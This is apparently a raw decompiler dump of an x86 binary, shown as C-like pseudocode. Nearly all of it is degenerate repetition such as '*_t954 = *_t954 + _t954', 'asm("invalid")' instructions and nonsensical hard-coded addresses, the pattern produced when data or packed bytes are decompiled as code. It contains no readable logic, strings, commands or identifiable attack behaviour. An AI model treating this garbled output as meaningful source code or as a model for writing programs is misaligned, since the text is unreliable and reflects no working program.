                                                                        				 *_t326 =  *((intOrPtr*)(_t940 + 0x7000401b)) + _t1197;
                                                                        				asm("adc [eax], eax");
                                                                        				if( *_t326 > 0) {
                                                                        					_t940 = _t940 + 1;
                                                                        					 *((intOrPtr*)(_t1220 + _t1242 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1242 + 0x40)) + _t1197;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        					 *_t940 =  *_t940 + _t940;
                                                                        				}
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t940 =  *_t940 + _t940;
                                                                        				 *_t1220 =  *_t1220 + _t940;
                                                                        				 *0x76 =  *0x76 + _t1220;
                                                                        				 *((intOrPtr*)(_t940 + 0x35)) =  *((intOrPtr*)(_t940 + 0x35)) + _t940;
                                                                        				_t941 = _t940 + 1;
                                                                        				 *_t941 =  *_t941 + _t941;
                                                                        				 *_t941 =  *_t941 + _t941;
                                                                        				 *((intOrPtr*)(_t941 - 0xffbded)) =  *((intOrPtr*)(_t941 - 0xffbded)) + _t1197;
                                                                        				asm("invalid");
                                                                        				 *_t941 =  *_t941 + 1;
                                                                        				 *_t941 =  *_t941 + _t941;
                                                                        				 *((intOrPtr*)(_t941 + 0x213400b6)) =  *((intOrPtr*)(_t941 + 0x213400b6)) + _t941;
                                                                        				_t1243 = _t1242 + 1;
                                                                        				 *_t941 =  *_t941 + _t941;
                                                                        				 *_t941 =  *_t941 + _t941;
                                                                        				_t942 = _t941 + _t1197;
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				_t1296 = _t1295 - 1;
                                                                        				asm("sbb eax, 0x10040");
                                                                        				 *_t942 =  *_t942 + _t942;
                                                                        				asm("aam 0x40");
                                                                        				_t943 = _t942 + 1;
                                                                        				 *_t943 =  *_t943 + _t943;
                                                                        				 *_t943 =  *_t943 + _t943;
                                                                        				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1220;
                                                                        				 *_t1220 =  *_t1220 + _t943;
                                                                        				 *_t943 =  *_t943 + _t943;
                                                                        				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1243;
                                                                        				 *_t943 =  *_t943 + _t943;
                                                                        				 *_t943 =  *_t943 + _t943;
                                                                        				 *((intOrPtr*)(_t943 + 0x1d)) =  *((intOrPtr*)(_t943 + 0x1d)) + _t1243;
                                                                        				_t944 = _t943 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t944;
                                                                        				 *_t944 =  *_t944 + _t944;
                                                                        				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1243;
                                                                        				 *_t944 =  *_t944 + _t944;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1243;
                                                                        				 *((intOrPtr*)(_t1280 + _t1197 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1197 + 0x40)) + _t1197;
                                                                        				_t945 = _t944 + _t1197;
                                                                        				asm("aaa");
                                                                        				_t1244 = _t1243 + 1;
                                                                        				 *_t945 =  *_t945 + _t945;
                                                                        				 *_t945 =  *_t945 + _t945;
                                                                        				 *_t945 =  *_t945 + _t1197;
                                                                        				asm("in al, 0x40");
                                                                        				_t949 = _t945 + 1 + _t1244 + 2;
                                                                        				 *_t949 =  *_t949 + _t949;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t949 + _t949)) =  *((intOrPtr*)(_t949 + _t949)) + _t1244;
                                                                        				 *_t949 =  *_t949 + _t949;
                                                                        				_t950 = _t949 + 1;
                                                                        				_t1198 = _t1197 + _t1197;
                                                                        				asm("invalid");
                                                                        				 *_t950 =  *_t950 + 1;
                                                                        				 *_t950 =  *_t950 + _t950;
                                                                        				 *_t950 =  *_t950 + _t950;
                                                                        				 *_t950 =  *_t950 + _t950;
                                                                        				 *((intOrPtr*)(_t1280 + _t1198 + 0x40)) =  *((intOrPtr*)(_t1280 + _t1198 + 0x40)) + _t1198;
                                                                        				 *_t950 =  *_t950 + _t1244;
                                                                        				_pop(_t1245);
                                                                        				if ( *_t950 >= 0) goto L60;
                                                                        				_t951 = _t1296;
                                                                        				_t1297 = _t950;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t951 =  *_t951 + _t951;
                                                                        				 *_t951 =  *_t951 + _t951;
                                                                        				_push(_t1297);
                                                                        				asm("sbb eax, 0x1cd40040");
                                                                        				_t952 = _t951 + 1;
                                                                        				 *((intOrPtr*)(_t952 + 0x11)) =  *((intOrPtr*)(_t952 + 0x11)) + _t1245;
                                                                        				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1245;
                                                                        				_t954 = _t952 + 2;
                                                                        				 *((intOrPtr*)(_t1220 + _t1245 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1245 + 0x40)) + _t1198;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t954 =  *_t954 + _t954;
                                                                        				 *_t1220 =  *_t1220 + _t954;
                                                                        				 *_t1276 =  *_t1276 + _t954;
                                                                        				 *((intOrPtr*)(_t954 + 0x35)) =  *((intOrPtr*)(_t954 + 0x35)) + _t954;
                                                                        				_t955 = _t954 + 1;
                                                                        				 *_t955 =  *_t955 + _t955;
                                                                        				 *_t955 =  *_t955 + _t955;
                                                                        				_t956 = _t955 + _t1198;
                                                                        				asm("adc eax, 0xffff0042");
                                                                        				asm("invalid");
                                                                        				 *_t956 =  *_t956 + _t956;
                                                                        				 *_t956 =  *_t956 + _t956;
                                                                        				asm("aam 0x36");
                                                                        				_t957 = _t956 + 1;
                                                                        				 *((intOrPtr*)(_t957 + 0x4220)) =  *((intOrPtr*)(_t957 + 0x4220)) + _t957;
                                                                        				 *_t957 =  *_t957 + _t957;
                                                                        				 *_t957 =  *_t957 + _t1220;
                                                                        				_t958 = _t957 - 1;
                                                                        				if (_t958 >= 0) goto L61;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t958 =  *_t958 + _t958;
                                                                        				 *_t1276 = _t1198;
                                                                        				_t959 = _t958 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t959;
                                                                        				 *_t959 =  *_t959 + _t959;
                                                                        				 *((intOrPtr*)(_t1276 + 0xb6)) =  *((intOrPtr*)(_t1276 + 0xb6)) + _t1245;
                                                                        				 *_t959 =  *_t959 + _t959;
                                                                        				 *_t1276 = _t1198;
                                                                        				_t960 = _t959 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t960;
                                                                        				 *_t960 =  *_t960 + _t960;
                                                                        				 *((intOrPtr*)(_t960 + 0x401e)) =  *((intOrPtr*)(_t960 + 0x401e)) + _t1245;
                                                                        				 *_t960 =  *_t960 + _t960;
                                                                        				 *((intOrPtr*)(_t1276 + _t1198 + 0x10040)) =  *((intOrPtr*)(_t1276 + _t1198 + 0x10040)) + _t1220;
                                                                        				 *_t960 =  *_t960 + _t960;
                                                                        				_push(ds);
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t1220 =  *_t1220 + _t997;
                                                                        				 *0x40356000 =  *0x40356000 + _t1220;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *_t997 =  *_t997 + 2;
                                                                        				asm("adc al, 0x42");
                                                                        				asm("invalid");
                                                                        				 *_t997 =  *_t997 + 1;
                                                                        				 *_t997 =  *_t997 + _t997;
                                                                        				 *((intOrPtr*)(_t997 + 0x76)) =  *((intOrPtr*)(_t997 + 0x76)) + _t997;
                                                                        				_t998 = _t997 + 1;
                                                                        				 *_t1220 = _t1220 +  *_t1220;
                                                                        				_t1250 = _t1249 + 1;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *((intOrPtr*)(_t998 + 0x76be)) =  *((intOrPtr*)(_t998 + 0x76be)) + 4;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t998 =  *_t998 + _t998;
                                                                        				 *_t1250 =  *_t1250 + 4;
                                                                        				_t999 = _t998 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t999;
                                                                        				 *_t999 =  *_t999 + _t999;
                                                                        				 *((intOrPtr*)(_t999 + 0x40 + _t999 * 2)) =  *((intOrPtr*)(_t999 + 0x40 + _t999 * 2)) + _t1250;
                                                                        				 *_t999 =  *_t999 + _t999;
                                                                        				 *_t999 =  *_t999 + _t999;
                                                                        				 *_t1250 =  *_t1250 + 4;
                                                                        				_t1000 = _t999 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t1000;
                                                                        				 *_t1000 =  *_t1000 + _t1000;
                                                                        				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1000;
                                                                        				 *_t1000 =  *_t1000 + _t1000;
                                                                        				 *_t1000 =  *_t1000 + _t1000;
                                                                        				 *((intOrPtr*)(_t1000 + 0x22)) =  *((intOrPtr*)(_t1000 + 0x22)) + _t1000;
                                                                        				_t1001 = _t1000 + 1;
                                                                        				 *_t1220 =  *_t1220 + _t1001;
                                                                        				 *_t1001 =  *_t1001 + _t1001;
                                                                        				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1001;
                                                                        				 *_t1001 =  *_t1001 + _t1001;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1250;
                                                                        				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1220;
                                                                        				 *((intOrPtr*)(_t1277 + _t1001 * 2)) =  *((intOrPtr*)(_t1277 + _t1001 * 2)) + _t1001;
                                                                        				_t1251 = _t1250 + 1;
                                                                        				 *_t1001 =  *_t1001 + _t1001;
                                                                        				 *_t1001 =  *_t1001 + _t1001;
                                                                        				 *((intOrPtr*)(_t1001 + 0x6400768c)) =  *((intOrPtr*)(_t1001 + 0x6400768c)) + 4;
                                                                        				_t1003 = _t1001 + 2;
                                                                        				 *((intOrPtr*)(_t1003 + 0x40 + _t1003 * 2)) =  *((intOrPtr*)(_t1003 + 0x40 + _t1003 * 2)) + _t1251;
                                                                        				 *_t1003 =  *_t1003 + _t1003;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t1003 + _t1003)) =  *((intOrPtr*)(_t1003 + _t1003)) + _t1251;
                                                                        				 *_t1003 =  *_t1003 + _t1003;
                                                                        				_t1004 = _t1003 + 1;
                                                                        				asm("invalid");
                                                                        				 *_t1004 =  *_t1004 + 1;
                                                                        				 *_t1004 =  *_t1004 + _t1004;
                                                                        				 *_t1004 =  *_t1004 + _t1004;
                                                                        				 *_t1004 =  *_t1004 + _t1004;
                                                                        				 *((intOrPtr*)(_t1251 + 0x40)) =  *((intOrPtr*)(_t1251 + 0x40)) + _t1220;
                                                                        				 *_t1004 =  *_t1004 + _t1251;
                                                                        				_pop(_t1252);
                                                                        				if ( *_t1004 >= 0) goto L69;
                                                                        				_t1005 = _t1298;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t1005 =  *_t1005 + _t1005;
                                                                        				 *_t1005 =  *_t1005 + _t1005;
                                                                        				_t1300 = _t1004 + 1;
                                                                        				asm("les esp, [ecx]");
                                                                        				_t1007 = (_t1005 &  *_t1005) + 1;
                                                                        				 *((intOrPtr*)(_t1007 + 0x11)) =  *((intOrPtr*)(_t1007 + 0x11)) + _t1252;
                                                                        				 *((intOrPtr*)(_t1277 + 0x11)) =  *((intOrPtr*)(_t1277 + 0x11)) + _t1252;
                                                                        				_t1009 = _t1007 + 2;
                                                                        				 *((intOrPtr*)(_t1220 + _t1252 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1252 + 0x40)) + 8;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1009;
                                                                        				 *_t1220 =  *_t1220 + _t1009;
                                                                        				 *_t1009 =  *_t1009 + _t1220;
                                                                        				 *((intOrPtr*)(_t1009 + 0x35)) =  *((intOrPtr*)(_t1009 + 0x35)) + _t1009;
                                                                        				_t1010 = _t1009 + 1;
                                                                        				 *_t1010 =  *_t1010 + _t1010;
                                                                        				 *_t1010 =  *_t1010 + _t1010;
                                                                        				 *((intOrPtr*)(_t1010 + 0x15)) =  *((intOrPtr*)(_t1010 + 0x15)) + 8;
                                                                        				_t1253 = _t1252 + 1;
                                                                        				_t1206 = 0x10;
                                                                        				asm("invalid");
                                                                        				 *_t1010 =  *_t1010 + 1;
                                                                        				 *_t1010 =  *_t1010 + _t1010;
                                                                        				 *((intOrPtr*)(0x76 + _t1277)) =  *((intOrPtr*)(0x76 + _t1277)) + _t1253;
                                                                        				_t1011 = _t1010 + 1;
                                                                        				 *((intOrPtr*)(_t1011 + 0x4220)) =  *((intOrPtr*)(_t1011 + 0x4220)) + _t1220;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + 0x10;
                                                                        				_t1221 = _t1220 - 1;
                                                                        				if (_t1221 >= 0) goto L70;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				if( *_t1011 >= 0) {
                                                                        					_t1165 = _t1011 + 1;
                                                                        					 *_t1221 =  *_t1221 + _t1165;
                                                                        					 *_t1165 =  *_t1165 + _t1165;
                                                                        					 *((intOrPtr*)(0xec)) =  *((intOrPtr*)(0xec)) + _t1253;
                                                                        					_t1166 = _t1165 + 1;
                                                                        					 *_t1166 =  *_t1166 + _t1166;
                                                                        					 *_t1166 =  *_t1166 + _t1166;
                                                                        					 *((intOrPtr*)(_t1166 + 0x23)) =  *((intOrPtr*)(_t1166 + 0x23)) + 0x10;
                                                                        					_t1011 = _t1166 + 1;
                                                                        					 *_t1221 =  *_t1221 + _t1011;
                                                                        					 *_t1011 =  *_t1011 + _t1011;
                                                                        					 *((intOrPtr*)(_t1011 + 0x4023)) =  *((intOrPtr*)(_t1011 + 0x4023)) + _t1011;
                                                                        					 *_t1011 =  *_t1011 + _t1011;
                                                                        					 *0x00000050 =  *((intOrPtr*)(0x50)) + 0x10;
                                                                        					 *_t1221 =  *_t1221 + _t1011;
                                                                        				}
                                                                        				 *_t1011 =  *_t1011 + _t1011;
                                                                        				 *((intOrPtr*)(_t1011 + 0x4023)) =  *((intOrPtr*)(_t1011 + 0x4023)) + _t1011;
                                                                        				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1253;
                                                                        				 *((intOrPtr*)(_t1011 + 0x18004023)) =  *((intOrPtr*)(_t1011 + 0x18004023)) + _t1221;
                                                                        				_t1013 =  *_t1253 * 0x00000000 & 0x0000000c;
                                                                        				if (_t1013 <= 0) goto L73;
                                                                        				 *((intOrPtr*)(0xec)) =  *((intOrPtr*)(0xec)) + _t1253;
                                                                        				_t1016 = (_t1013 & 0x0000003f) + 2;
                                                                        				 *_t1016 =  *_t1016 + _t1016;
                                                                        				_pop(ds);
                                                                        				 *((intOrPtr*)(_t1016 + _t1016)) =  *((intOrPtr*)(_t1016 + _t1016)) + _t1253;
                                                                        				 *_t1016 =  *_t1016 + _t1016;
                                                                        				_t1017 = _t1016 + 1;
                                                                        				_t1207 = _t1206 + _t1206;
                                                                        				asm("invalid");
                                                                        				 *_t1017 =  *_t1017 + 1;
                                                                        				 *_t1017 =  *_t1017 + _t1017;
                                                                        				 *_t1017 =  *_t1017 + _t1017;
                                                                        				 *_t1017 =  *_t1017 + _t1017;
                                                                        				_t551 = _t1017 + 0x10004023;
                                                                        				 *_t551 =  *((intOrPtr*)(_t1017 + 0x10004023)) + _t1221;
                                                                        				_pop(_t1254);
                                                                        				if ( *_t551 >= 0) goto L74;
                                                                        				_t1018 = _t1300;
                                                                        				asm("invalid");
                                                                        				asm("invalid");
                                                                        				 *_t1018 =  *_t1018 + _t1018;
                                                                        				 *_t1018 =  *_t1018 + _t1018;
                                                                        				 *_t1207 =  *_t1207 & 0x00000040;
                                                                        				 *_t1018 =  *_t1018 + _t1018;
                                                                        				_t1019 = _t1018 &  *_t1018;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
                                                                        				 *((intOrPtr*)(0x24000003)) =  *((intOrPtr*)(0x24000003)) + 0x24000003;
